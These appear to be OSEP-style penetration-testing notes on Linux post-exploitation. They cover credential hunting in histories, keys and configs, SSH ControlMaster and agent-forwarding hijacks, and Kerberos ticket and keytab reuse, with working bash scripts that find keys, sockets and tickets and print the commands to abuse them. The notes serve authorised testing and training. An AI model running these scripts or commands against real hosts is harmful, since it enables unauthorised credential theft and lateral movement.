OSEP Notes
Local Reconnaissance Linux

Bash History

  • Check the current user's shell history (~/.bash_history; also ~/.zsh_history, ~/.mysql_history, ~/.psql_history and ~/.python_history when present)

  • After escalating to root, check every user's history under /home/*/ and /root/

SSH Key

  • id_rsa

Private keys are not always named id_rsa; a file such as bob.key may be one. Check the content for a "-----BEGIN ... PRIVATE KEY-----" header rather than trusting the filename.

/home/bob/.ssh/id_rsa may actually be another user's key (e.g. Alice's), so try every key found against every host and account you know of.

  • known_hosts (if readable)

Lists the servers the current user has connected to, i.e. where the private key may be accepted. Entries may be hashed (lines starting with |1|), in which case the hostnames cannot be read back directly.

  • authorized_keys

Lists the public keys allowed to log in as this user; the trailing comment (usually user@host) reveals which clients hold the matching private keys.
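The checks in the Bash History and SSH Key sections above can be run in one pass. The following script is an added example, not part of the original notes: it finds non-empty history files, locates private keys by their PEM header instead of their filename (so a renamed bob.key is caught), and summarises known_hosts and authorized_keys. The sample home directories it builds are constructed for the demo; on a real host call the functions against /home or / instead.

```bash
#!/bin/bash
# Added example (not from the original notes): enumerate credential-bearing
# dotfiles under a root directory such as /home or / (run as root to see them all).

# History files that are readable and non-empty.
find_history() {
    find "$1" -type f -size +0 \
        \( -name '.bash_history' -o -name '.zsh_history' -o -name '.sh_history' \
           -o -name '.mysql_history' -o -name '.psql_history' -o -name '.python_history' \) \
        2>/dev/null | sort
}

# Private keys are often renamed (bob.key, backup.txt, ...), so match on the
# PEM header in the first line instead of on the filename. Small files only.
find_private_keys() {
    find "$1" -type f -size -64k 2>/dev/null | while IFS= read -r f; do
        if head -n1 "$f" 2>/dev/null | grep -q -- '-----BEGIN .*PRIVATE KEY-----'; then
            printf '%s\n' "$f"
        fi
    done | sort
}

# known_hosts: plain entries reveal hostnames the user's key may be accepted on;
# hashed entries (|1|...) only tell you how many distinct hosts were contacted.
known_hosts_summary() {
    local f plain hashed
    find "$1" -type f -name known_hosts 2>/dev/null | sort | while IFS= read -r f; do
        plain=$(awk '!/^[[:space:]]*(#|$)/ && $1 !~ /^[|@]/ {
                        n = split($1, h, ","); for (i = 1; i <= n; i++) print h[i] }' "$f" \
                | sort -u | tr '\n' ' ')
        hashed=$(grep -c '^|1|' "$f" || true)
        printf '%s: hosts=[%s] hashed=%s\n' "$f" "${plain% }" "$hashed"
    done
}

# authorized_keys: print key type and comment (the comment is usually user@host
# of the client that owns the private key). Options before the key type are skipped.
authorized_keys_summary() {
    local f
    find "$1" -type f -name authorized_keys 2>/dev/null | sort | while IFS= read -r f; do
        awk -v f="$f" '!/^[[:space:]]*(#|$)/ {
            for (i = 1; i <= NF; i++)
                if ($i ~ /^(ssh-|ecdsa-|sk-)/) {
                    c = ""
                    for (j = i + 2; j <= NF; j++) c = c (c == "" ? "" : " ") $j
                    print f ": " $i " " (c == "" ? "(no comment)" : c)
                    break
                }
        }' "$f"
    done
}

# Constructed sample tree for the demo (fake keys, not real material).
make_sample_tree() {
    local root=$1
    mkdir -p "$root/home/bob/.ssh" "$root/home/alice"
    printf 'mysql -u app -pS3cret! appdb\nls\n' > "$root/home/bob/.bash_history"
    : > "$root/home/alice/.bash_history"                     # empty: must be skipped
    printf -- '-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEA\n-----END OPENSSH PRIVATE KEY-----\n' \
        > "$root/home/bob/bob.key"                           # renamed private key
    printf 'web03,10.10.10.3 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI...\n|1|abc=|def= ssh-rsa AAAAB3...\n' \
        > "$root/home/bob/.ssh/known_hosts"
    printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI... alice@web03\nfrom="10.10.10.5" ssh-rsa AAAAB3... kevin@jump\n' \
        > "$root/home/bob/.ssh/authorized_keys"
}

# Usage on a live host: find_history /home; find_private_keys /; known_hosts_summary /home; authorized_keys_summary /home
```

The known_hosts summary deliberately keeps the hashed count: a file with ten hashed entries and no plain ones still tells you the key has been used widely, which is worth brute-forcing hostnames against with ssh-keygen -F.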

Credentials in config/text files

  • Config files of web apps (database connection strings, API keys, backup copies such as config.php.bak)

  • Credential reuse: try every password found against other local accounts, databases, and hosts

Database

  • Credentials stored in tables (user/password columns; hashes may still be cracked or reused elsewhere)

  • Credential reuse: the database password itself is often shared with OS or domain accounts

sudo -l

  • GTFOBins (look up every allowed binary for a shell, file-read or file-write primitive)

SUID binaries

  • GTFOBins (same lookup for any unusual SUID binary)

SSH control master

A -> B: A already has a multiplexed session open to B (ControlMaster). Piggyback on A's existing connection to B; no key or password is needed because the master already authenticated.

Check ~/.ssh/config or /etc/ssh/ssh_config for ControlMaster and ControlPath settings.

Look for socket files named like kevin@web03:22 in /home/kevin/.ssh/controlmaster (the ControlPath pattern %r@%h:%p)

As kevin, the client picks up the socket automatically via the config:

ssh kevin@web03

If logged in as root, point ssh at another user's socket explicitly:

ssh -S /home/alice/.ssh/controlmaster/alice@web03:22 alice@web03

SSH Agent Forwarding

A -> B -> C: A has a session on B with agent forwarding enabled (ForwardAgent yes), and A's private key is accepted by both B and C. The key never leaves A; B only holds a forwarded agent socket, but that is enough to authenticate to C.

On B, to reach C:

Normal user (SSH_AUTH_SOCK is already set in the forwarded session)

ssh alice@web03

Privileged user: locate the forwarded socket (/tmp/ssh-xxx, i.e. the OpenSSH default /tmp/ssh-*/agent.<pid>), list the keys it holds, then use it

SSH_AUTH_SOCK=/tmp/ssh-xxx ssh-add -l

SSH_AUTH_SOCK=/tmp/ssh-xxx ssh alice@web03
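Both the ControlMaster and the agent-forwarding hijacks above start with the same hunt: find Unix sockets and decide which ones are SSH-related. The script below is an added example, not from the original notes. It assumes the target's ControlPath uses the %r@%h:%p pattern (as the kevin@web03:22 example does) and that agent sockets follow the OpenSSH default /tmp/ssh-*/agent.<pid>; the socket paths fed to it in the demo are constructed.

```bash
#!/bin/bash
# Added example (not from the original notes): classify Unix sockets found on a
# host as SSH ControlMaster or agent sockets and print the command to reuse them.
# Assumptions: ControlPath = .../%r@%h:%p (assumed), agent = /tmp/ssh-*/agent.<pid>.

# Candidate sockets on a live host (run as root to see other users' sockets).
find_ssh_sockets() {
    find /tmp /home /root /run -type s 2>/dev/null
}

# Read socket paths on stdin, one per line; print "kind<TAB>socket<TAB>command".
# Sockets that are neither a ControlMaster nor an agent socket are dropped.
classify_ssh_sockets() {
    local sock base user hostport host port
    while IFS= read -r sock; do
        base=${sock##*/}
        case "$sock" in
            */ssh-*/agent.*)
                # Forwarded agent: ssh-add -l lists the keys it holds, then ssh uses them
                # for the next hop. <user>@<next-hop> is a placeholder for the reader.
                printf 'agent\t%s\tSSH_AUTH_SOCK=%s ssh-add -l && SSH_AUTH_SOCK=%s ssh <user>@<next-hop>\n' \
                    "$sock" "$sock" "$sock"
                ;;
            *)
                case "$base" in
                    *@*:*)
                        # Parse user@host:port out of the %r@%h:%p socket name.
                        user=${base%%@*}
                        hostport=${base#*@}
                        host=${hostport%:*}
                        port=${hostport##*:}
                        # -O check confirms the master is still alive before riding its connection.
                        printf 'controlmaster\t%s\tssh -S %s -O check %s@%s && ssh -S %s -p %s %s@%s\n' \
                            "$sock" "$sock" "$user" "$host" "$sock" "$port" "$user" "$host"
                        ;;
                esac
                ;;
        esac
    done
}

# Run the live scan only when asked; the functions are also usable from another script.
if [ "${1:-}" = "--scan" ]; then
    find_ssh_sockets | classify_ssh_sockets
fi
```

The ControlMaster command pairs the hijack with -O check so a stale socket (master already exited) fails fast instead of silently falling back to a normal, password-prompting connection.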

ccache file

  • Kerberos credential cache: holds the TGT and service tickets a logged-in user has requested

/tmp/krb5cc_jack

  • Use it directly on Linux by pointing KRB5CCNAME at it (klist then shows the cached tickets):

export KRB5CCNAME=/tmp/krb5cc_george

  • Convert the ccache to a kirbi file (impacket's ticketConverter.py) when the ticket is needed on Windows, e.g. with Rubeus or Mimikatz

/etc/krb5.keytab

  • The host's keytab (machine account keys), normally readable only by root; it can be used for Kerberos authentication as the host principal

keytab file

  • Contains Kerberos principal names and their long-term keys, so anyone who can read it can authenticate as those principals without knowing a password

/tmp/alice.keytab

Look in /etc/crontab (and other cron entries) for scheduled jobs that call kinit with a keytab; they reveal the keytab path and the principal to use. klist -k -t <keytab> lists the principals a keytab holds, and the realm must match the case stored in it.

kinit -k -t /tmp/alice.keytab alice@red.com
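The ccache and keytab sections above both depend on finding the files first, and a dropped keytab like /tmp/alice.keytab need not carry a telling name. The script below is an added example, not part of the original notes: it recognises keytabs and credential caches by their two-byte version header rather than by filename, and prints the KRB5CCNAME / kinit / ticketConverter.py command for each. The files it creates for the demo are constructed headers only, not real Kerberos material.

```bash
#!/bin/bash
# Added example (not from the original notes): locate Kerberos keytabs and
# credential caches by content and print the command that uses each one.

# Classify by the 2-byte version header: keytab = 0x05 0x02,
# MIT ccache v4 = 0x05 0x04 (v3 = 0x05 0x03). Prints keytab|ccache|other.
krb_file_type() {
    local magic
    magic=$(head -c 2 "$1" 2>/dev/null | od -An -tx1 | tr -d ' \n')
    case "$magic" in
        0502)      echo keytab ;;
        0504|0503) echo ccache ;;
        *)         echo other ;;
    esac
}

# Walk the given directories (default: the usual suspects) and print
# "kind<TAB>path<TAB>command". Only small, readable files are inspected.
krb_artifacts() {
    local f t
    [ $# -gt 0 ] || set -- /tmp /etc /var /home /root
    find "$@" -xdev -type f -size -64k 2>/dev/null | while IFS= read -r f; do
        [ -r "$f" ] || continue
        t=$(krb_file_type "$f")
        case "$t" in
            keytab)
                # klist -k -t shows the principals inside; kinit then needs one of them.
                printf 'keytab\t%s\tklist -k -t %s && kinit -k -t %s <principal>\n' "$f" "$f" "$f"
                ;;
            ccache)
                # Use the cache in place, or convert it to kirbi for Windows tooling.
                printf 'ccache\t%s\tKRB5CCNAME=%s klist; ticketConverter.py %s %s.kirbi\n' \
                    "$f" "$f" "$f" "$f"
                ;;
        esac
    done
}

# Constructed sample tree for the demo (headers only, no real keys or tickets).
make_sample_krb_tree() {
    local root=$1
    mkdir -p "$root/tmp" "$root/etc"
    printf '\005\002keytab-body' > "$root/tmp/alice.keytab"   # keytab header
    printf '\005\004ccache-body' > "$root/tmp/krb5cc_george"  # ccache v4 header
    printf '\005\002keytab-body' > "$root/tmp/.cache.dat"     # keytab hiding under a bland name
    printf 'not kerberos\n'      > "$root/etc/motd"
}

# Usage on a live host: krb_artifacts            (scans /tmp /etc /var /home /root)
#                       krb_artifacts /opt /srv  (scan other trees)
```

Matching on the header is what catches the second keytab in the sample (.cache.dat); a name-based search for *.keytab or krb5cc_* would have missed it.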

pspy

  • Watches processes and cron jobs in real time without root; hidden cron jobs and scripts may pass credentials on the command line

/opt/pbis

  • PowerBroker Identity Services (BeyondTrust AD Bridge): its presence means the host is domain-joined, and the tools under /opt/pbis/bin can enumerate the domain from Linux

  • Make use of the keytab and ccache files on the host for Kerberos authentication against the domain
